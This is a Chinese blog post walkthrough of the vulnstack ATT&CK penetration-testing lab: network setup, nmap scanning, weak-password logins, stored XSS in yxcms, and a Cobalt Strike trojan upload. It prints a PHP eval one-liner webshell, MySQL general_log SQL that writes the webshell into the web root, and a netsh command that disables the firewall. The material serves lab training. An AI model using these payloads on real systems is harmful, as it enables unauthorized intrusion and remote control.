<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"swanq.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="1. 环境搭建说实话对于搭建window内外网IP之前没试过，觉得也很简单，结果把内网网络适配器和外网的网络适配器搞反了，导致时间耗费较高，特此记录。其他的博客大抵都跳过了此步骤。 下载靶场环境：http:&#x2F;&#x2F;vulnstack.qiyuanxuetang.net&#x2F;vuln&#x2F;detail&#x2F;2&#x2F; 大家的模拟攻击示意图很清楚，在此借鉴一下：  靶机环境拓扑图如下： 配置网络： 分别给web服务器配置N">
<meta property="og:type" content="article">
<meta property="og:title" content="ATK&amp;CK实战靶场搭建及攻击">
<meta property="og:url" content="http://swanq.top/2021/05/14/PenetrationRange/index.html">
<meta property="og:site_name" content="SwanQ&#39;s blog">
<meta property="og:description" content="1. 环境搭建说实话对于搭建window内外网IP之前没试过，觉得也很简单，结果把内网网络适配器和外网的网络适配器搞反了，导致时间耗费较高，特此记录。其他的博客大抵都跳过了此步骤。 下载靶场环境：http:&#x2F;&#x2F;vulnstack.qiyuanxuetang.net&#x2F;vuln&#x2F;detail&#x2F;2&#x2F; 大家的模拟攻击示意图很清楚，在此借鉴一下：  靶机环境拓扑图如下： 配置网络： 分别给web服务器配置N">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/4.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/2.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/3.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/1.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/5.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/6.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/7.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/8.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/9.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/10.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/11.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/12.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/13.jpg">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/14.jpg">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/13.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/14.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/15.jpg">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/15.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/16.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/17.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/18.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/19.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/20.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/21.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/22.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/23.png">
<meta property="og:image" content="http://swanq.top/2021/05/14/PenetrationRange/24.png">
<meta property="article:published_time" content="2021-05-14T12:00:13.000Z">
<meta property="article:modified_time" content="2021-05-22T13:36:22.271Z">
<meta property="article:author" content="swanQ">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="靶场">
<meta property="article:tag" content="域环境搭建">
<meta property="article:tag" content="域控">
<meta property="article:tag" content="cobalt strike">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://swanq.top/2021/05/14/PenetrationRange/4.png">

<link rel="canonical" href="http://swanq.top/2021/05/14/PenetrationRange/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ATK&CK实战靶场搭建及攻击 | SwanQ's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SwanQ's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">强到不会输给任何不讲理的<恶></p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://swanq.top/2021/05/14/PenetrationRange/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="swanQ">
      <meta itemprop="description" content="Try & Enjoy">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SwanQ's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ATK&CK实战靶场搭建及攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-05-14 20:00:13" itemprop="dateCreated datePublished" datetime="2021-05-14T20:00:13+08:00">2021-05-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-05-22 21:36:22" itemprop="dateModified" datetime="2021-05-22T21:36:22+08:00">2021-05-22</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="1-环境搭建"><a href="#1-环境搭建" class="headerlink" title="1. 环境搭建"></a>1. 环境搭建</h1><p>说实话对于搭建window内外网IP之前没试过，觉得也很简单，结果把内网网络适配器和外网的网络适配器搞反了，导致时间耗费较高，特此记录。其他的博客大抵都跳过了此步骤。</p>
<p>下载靶场环境：<a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/2/">http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</a></p>
<p>大家的模拟攻击示意图很清楚，在此借鉴一下：</p>
<p><img src="/2021/05/14/PenetrationRange/4.png"></p>
<p>靶机环境拓扑图如下：<br><img src="/2021/05/14/PenetrationRange/2.png"></p>
<p>配置网络：</p>
<p>分别给web服务器配置NAT模式的网卡一个作为外网，VMnet2的网卡一个作为内网。其余域控和域成员分配一个VMnet2即可。在vmware的虚拟网络配置器里面需要添加VMnet2，且设置NAT模式取消DHCP自动分配IP选项。</p>
<p>win7开机后，需要设置本地连接6的IPV4如下图所示：</p>
<p>控制面板 - 网络和Internet - 网络和共享中心 - 更改适配器设置 - 右键本地连接6 - 双击IPv4，其中<strong>114.114.114.114</strong>是国内三大运营商的通用DNS，是国内用户上网常用的DNS</p>
<p><strong>8.8.8.8</strong>和<strong>8.8</strong>.<strong>4.4</strong> 是Google提供的免费DNS服务器的IP，更适合国外以及访问国外网站的用户使用</p>
<p><img src="/2021/05/14/PenetrationRange/3.png"></p>
<p>参考下图:<br><img src="/2021/05/14/PenetrationRange/1.png"></p>
<p>开启win7的phpstudy,同时测试win7是否可以pingkali和内网的两台主机。ping通over，环境搭建到此结束。</p>
<h1 id="2-攻击流程"><a href="#2-攻击流程" class="headerlink" title="2. 攻击流程"></a>2. 攻击流程</h1><h2 id="0x01-主机发现"><a href="#0x01-主机发现" class="headerlink" title="0x01 主机发现"></a>0x01 主机发现</h2><p>DMZ区也就是处于两个防火墙之间的，一个合格的DMZ区是为了提供外部主机访问内网资源服务器的一个缓冲区域，应该有着严格的内外网隔离，本次靶场只是一个模拟，dmz区并没有很合规。</p>
<p>那么入手以后，先进行信息收集，桥接嘛，那么直接扫一下桥接网段的存活主机</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.140.0/24</span><br><span class="line"></span><br><span class="line">netdiscover -i eth0 -r 192.168.140.0/24</span><br></pre></td></tr></table></figure>

<p><img src="/2021/05/14/PenetrationRange/5.png"></p>
<p>获得目标IP，开始扫描端口：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> -vv提高输出信息的详细度</span></span><br><span class="line">nmap -sV -vv -p 1-65535 192.168.140.130</span><br></pre></td></tr></table></figure>

<p><img src="/2021/05/14/PenetrationRange/6.png"></p>
<p><img src="/2021/05/14/PenetrationRange/7.png"></p>
<p>80端口是一个phpstudy探针：</p>
<p><img src="/2021/05/14/PenetrationRange/8.png"></p>
<p>最下方有数据库登陆框测试mysql连同，尝试root/root即可登陆。初步getshell思路就是通过mysql拿shell。</p>
<p><img src="/2021/05/14/PenetrationRange/9.png"></p>
<p>目录扫描还是御剑靠谱一点，扫出beifen.rar。</p>
<p><img src="/2021/05/14/PenetrationRange/10.png"></p>
<p>备份文件发现网站源码，打开robots.txt发现网站CMS为yxcms，访问<code>http://192.168.1.102/yxcms</code>进入网站首页</p>
<h2 id="0x02-漏洞利用"><a href="#0x02-漏洞利用" class="headerlink" title="0x02 漏洞利用"></a>0x02 漏洞利用</h2><h3 id="漏洞一：信息泄露-弱口令"><a href="#漏洞一：信息泄露-弱口令" class="headerlink" title="漏洞一：信息泄露+弱口令"></a>漏洞一：信息泄露+弱口令</h3><p>网站<a target="_blank" rel="noopener" href="http://192.168.1.102/yxcms%E5%90%8E%E5%8F%B0%E6%B3%84%E9%9C%B2%E5%90%8E%E5%8F%B0%E7%99%BB%E9%99%86%E5%9C%B0%E5%9D%80%E5%92%8C%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E3%80%82">http://192.168.1.102/yxcms后台泄露后台登陆地址和用户密码。</a></p>
<p><img src="/2021/05/14/PenetrationRange/11.png"></p>
<p><img src="/2021/05/14/PenetrationRange/12.png"></p>
<p>成功登陆后台管理页面，可以添加、编辑、删除管理员，管理数据库及上传文件。</p>
<h3 id="漏洞二：PhpMyAdmin弱口令"><a href="#漏洞二：PhpMyAdmin弱口令" class="headerlink" title="漏洞二：PhpMyAdmin弱口令"></a>漏洞二：PhpMyAdmin弱口令</h3><p>使用默认用户名/口令（root/root）成功登录PhpMyAdmin管理页面，可以看到数据库的所有内容</p>
<p><img src="/2021/05/14/PenetrationRange/13.jpg"></p>
<h3 id="漏洞三：yxcms留言本XSS存储型漏洞"><a href="#漏洞三：yxcms留言本XSS存储型漏洞" class="headerlink" title="漏洞三：yxcms留言本XSS存储型漏洞"></a>漏洞三：yxcms留言本XSS存储型漏洞</h3><p>前台提交带有XSS代码的留言，后台审核成功弹出XSS弹窗，审核通过之后，前台成功弹窗。通过该漏洞可以获取管理员cookie或者诱导管理员点击执行某恶意代码</p>
<p><img src="/2021/05/14/PenetrationRange/14.jpg"></p>
<p><img src="/2021/05/14/PenetrationRange/13.png"></p>
<h3 id="漏洞四：yxcms后台任意文件读写漏洞"><a href="#漏洞四：yxcms后台任意文件读写漏洞" class="headerlink" title="漏洞四：yxcms后台任意文件读写漏洞"></a>漏洞四：yxcms后台任意文件读写漏洞</h3><p>后台管理首页–&gt; 前台模板–&gt;管理模板文件 –&gt;新建hack.php文件</p>
<p><img src="/2021/05/14/PenetrationRange/14.png"></p>
<p>找备份文件即可看到文件的保存目录为：<a target="_blank" rel="noopener" href="http://192.168.1.102/yxcms/protected/apps/default/view/default/hack.php">http://192.168.1.102/yxcms/protected/apps/default/view/default/hack.php</a></p>
<p><img src="/2021/05/14/PenetrationRange/15.jpg"></p>
<p>使用蚁剑成功连接：</p>
<p><img src="/2021/05/14/PenetrationRange/15.png"></p>
<h3 id="漏洞五：PhpMyAdmin开启全局日志getshell"><a href="#漏洞五：PhpMyAdmin开启全局日志getshell" class="headerlink" title="漏洞五：PhpMyAdmin开启全局日志getshell"></a>漏洞五：PhpMyAdmin开启全局日志getshell</h3><ol>
<li><p>测试是否可以使用into outfile写入文件到web目录：Select ‘<?php eval($_POST[hack]);?> ‘ into outfile ‘C:/phpStudy/WWW/hack.php’。发现写入失败。</p>
</li>
<li><p>再查看变量secure-file-priv 值： <code>show global variables like ‘%secure%’</code>发现为NULL，为只读无法修改。</p>
</li>
</ol>
<p><img src="/2021/05/14/PenetrationRange/16.png"></p>
<p><img src="/2021/05/14/PenetrationRange/17.png"></p>
<ol start="3">
<li><p>尝试用全局日志写shell，查看全局变量general_log：<code>show global variables like ‘%general_%’</code>。于是开启全局日志并修改日志保存位置为C:/phpStudy/WWW/hack.php</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> <span class="keyword">global</span> general_log<span class="operator">=</span><span class="keyword">on</span>;</span><br><span class="line"><span class="keyword">set</span> <span class="keyword">global</span> general_log_file<span class="operator">=</span><span class="string">&#x27;C:/phpStudy/WWW/hack.php&#x27;</span>;</span><br></pre></td></tr></table></figure></li>
</ol>
<p><img src="/2021/05/14/PenetrationRange/18.png"></p>
<p><img src="/2021/05/14/PenetrationRange/19.png"></p>
<p>查询一句话写入日志<code>Select &#39;&lt;?php eval($_POST[hack]);?&gt;&#39;</code></p>
<p><img src="/2021/05/14/PenetrationRange/20.png"></p>
<p>使用蚁剑连接一句话木马<code>http://192.168.140.130/hack.php</code>。web目录直接IP加文件名就好。</p>
<h3 id="漏洞六：yxcms后台SQL注入漏洞"><a href="#漏洞六：yxcms后台SQL注入漏洞" class="headerlink" title="漏洞六：yxcms后台SQL注入漏洞"></a>漏洞六：yxcms后台SQL注入漏洞</h3><p>待补充。其他博客的资料此处有问题。</p>
<p>前渗透到此结束，下面为后渗透流程</p>
<h2 id="0x03-getshell"><a href="#0x03-getshell" class="headerlink" title="0x03 getshell"></a>0x03 getshell</h2><p>此时会用到Cobalt Strike, 以Metasploit为基础的GUI框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，exe、powershell木马生成等。是团队渗透神器，能让多个攻击者同时连接到团体服务器上，共享攻击资源与目标信息和sessions。对内网的渗透测试和作为apt的控制终端功能，使其变成众多APT组织的首选。</p>
<p>我们用kali作为CS服务器，用蚁剑给win7上传java 11和CS。CS服务器和CS客户端分别如下：</p>
<p><img src="/2021/05/14/PenetrationRange/21.png"></p>
<p><img src="/2021/05/14/PenetrationRange/22.png"></p>
<p>选择监听器，为后头生成木马做铺垫</p>
<p>蚁剑关闭防火墙：终端执行：netsh advfirewall set allprofiles state off</p>
<p><img src="/2021/05/14/PenetrationRange/23.png"></p>
<p>生成木马artifact.exe.（Attacks -&gt; Packages -&gt; Windows Executable ）,并用蚁剑上传win7。用蚁剑终端执行artifact.exe之后，win7提示artifact.exe已停止工作。</p>
<p><img src="/2021/05/14/PenetrationRange/24.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
              <a href="/tags/%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" rel="tag"># 域环境搭建</a>
              <a href="/tags/%E5%9F%9F%E6%8E%A7/" rel="tag"># 域控</a>
              <a href="/tags/cobalt-strike/" rel="tag"># cobalt strike</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/05/05/bulldog/" rel="prev" title="渗透测试之bulldog">
      <i class="fa fa-chevron-left"></i> 渗透测试之bulldog
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/22/%E4%BA%91%E8%AE%A1%E7%AE%97%E5%8F%96%E8%AF%81%E7%BB%BC%E8%BF%B0/" rel="next" title="云计算取证综述">
      云计算取证综述 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">1.</span> <span class="nav-text">1. 环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="nav-number">2.</span> <span class="nav-text">2. 攻击流程</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="nav-number">2.1.</span> <span class="nav-text">0x01 主机发现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">2.2.</span> <span class="nav-text">0x02 漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%B8%80%EF%BC%9A%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="nav-number">2.2.1.</span> <span class="nav-text">漏洞一：信息泄露+弱口令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BA%8C%EF%BC%9APhpMyAdmin%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="nav-number">2.2.2.</span> <span class="nav-text">漏洞二：PhpMyAdmin弱口令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%B8%89%EF%BC%9Ayxcms%E7%95%99%E8%A8%80%E6%9C%ACXSS%E5%AD%98%E5%82%A8%E5%9E%8B%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.2.3.</span> <span class="nav-text">漏洞三：yxcms留言本XSS存储型漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%9B%9B%EF%BC%9Ayxcms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.2.4.</span> <span class="nav-text">漏洞四：yxcms后台任意文件读写漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BA%94%EF%BC%9APhpMyAdmin%E5%BC%80%E5%90%AF%E5%85%A8%E5%B1%80%E6%97%A5%E5%BF%97getshell"><span class="nav-number">2.2.5.</span> <span class="nav-text">漏洞五：PhpMyAdmin开启全局日志getshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%85%AD%EF%BC%9Ayxcms%E5%90%8E%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.2.6.</span> <span class="nav-text">漏洞六：yxcms后台SQL注入漏洞</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-getshell"><span class="nav-number">2.3.</span> <span class="nav-text">0x03 getshell</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">swanQ</p>
  <div class="site-description" itemprop="description">Try & Enjoy</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">swanQ</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">NaNm</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">NaN:aN</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
